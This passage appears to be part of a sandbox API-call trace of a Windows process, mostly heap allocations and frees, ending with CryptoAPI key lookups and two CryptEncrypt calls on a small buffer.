Size=0x10) returned 0x43ca8e0 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0114.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0114.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0114.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0114.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.314] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.314] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2580, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2580*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0114.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0114.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.316] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0114.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.317] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.317] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0114.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0114.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.319] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.320] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.320] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.320] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0114.320] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0114.321] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x66d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x670) returned 1 [0114.321] CharLowerBuffW (in: lpsz="byte[1649]", cchLength=0xa | out: lpsz="byte[1649]") returned 0xa [0114.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0114.322] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43fbe00*, pdwDataLen=0x144e538*=0x66d, dwBufLen=0x670 | out: pbData=0x43fbe00*, pdwDataLen=0x144e538*=0x670) returned 1 [0114.322] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf 